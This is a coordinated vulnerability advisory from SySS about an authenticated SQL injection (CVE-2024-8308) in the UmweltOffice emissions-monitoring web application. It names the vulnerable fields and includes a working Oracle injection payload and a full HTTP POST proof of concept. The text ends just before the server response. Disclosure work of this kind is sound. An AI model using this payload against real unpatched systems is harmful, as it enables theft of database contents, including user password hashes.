-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-074 Product: UmweltOffice Manufacturer: Siempelkamp NIS Ingenieurgesellschaft mbH Affected Version(s): <7.4.3 Tested Version(s): 7.4.1 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2024-08-28 Solution Date: 2024-11-11 Public Disclosure: 2024-11-25 CVE Reference: CVE-2024-8308 Authors of Advisory: Johannes Lauinger and Fidelis Abt, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: UmweltOffice by Siempelkamp NIS Ingenieurgesellschaft mbH is a system to continuously monitor emission data and make it available in the form of a web application. The application is also used to report emission data to the respective authorities. The manufacturer describes the product as follows (see [1]): "TALAS/7 with the UmweltOffice® V.7 PC system is a complete, networkable system for continuous acquisition, storage and analysis of emissions data through all branches of industry according to the Technical Instructions on Air Quality Control (TA-Luft), 13., 17., 27., 30. and 44. BlmSchV - (German emission safety regulations)." Due to improper handling of HTTP request input data, the web application is vulnerable to an SQL injection vulnerability. The functionality shown to be affected is accessible only after logging in to the application with any valid credentials (including low-privileged accounts), making this an authenticated SQL injection vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: After logging in to the application, it is possible to access stored notifications. This functionality is available by first opening the menu item "Input" ("Eingabe") and then "Notifications" ("Mitteilungen"). Notifications are shown in a list which can be filtered. To edit the filter, the button "Edit Filter" ("Filter bearbeiten") is used. This opens up an input form with different filter options. Updating the filter options results in an HTTP POST request being sent to the server. This request is vulnerable to both error-based and time- based boolean blind SQL injection in the following fields: * filterBkbId * filterAkbId * filterMkbId The vulnerability allows accessing the underlying Oracle DBMS and exfiltrating all data, including the salted password hashes of all users. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The Oracle database version banner can be retreived by setting the value 'filterBkbId' for the POST request '/emission/auswerten_mitteilungen.do' as follows: filterBkbId=1)) AND 42=DBMS_UTILITY.SQLID_TO_SQLHASH((SELECT banner FROM v$version FETCH FIRST 1 ROWS ONLY)) AND ((1=1 The full POST request sent to the application is shown in the following listing, where the 'Host' and 'Content-Length' header values as well as the session token have been redacted: POST /emission/auswerten_mitteilungen.do HTTP/1.1 Content-Length: XXX Host: xxx.xxx.xxx.xxx Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX filterAnwenden=false&formid=frmFilter&radioZeit=mz&filterZeitVonString=2024-07-21&filterArtId=0&filterBkbId=1))+AND+42%3dDBMS_UTILITY.SQLID_TO_SQLHASH((SELECT+banner+FROM+v$version+FETCH+FIRST+1+ROWS+ONLY))+AND+((1%3d1&filterZeitBisString=2024-08-22&filterStatusId=1&filterAkbId=%2A12&filterDurchId=36&filterMkbId=-1&btnFilterAnwenden=clicked&btnBerichtPDF=&btnBerichtTXT= The relevant part of the response which is returned by the application is shown in the following: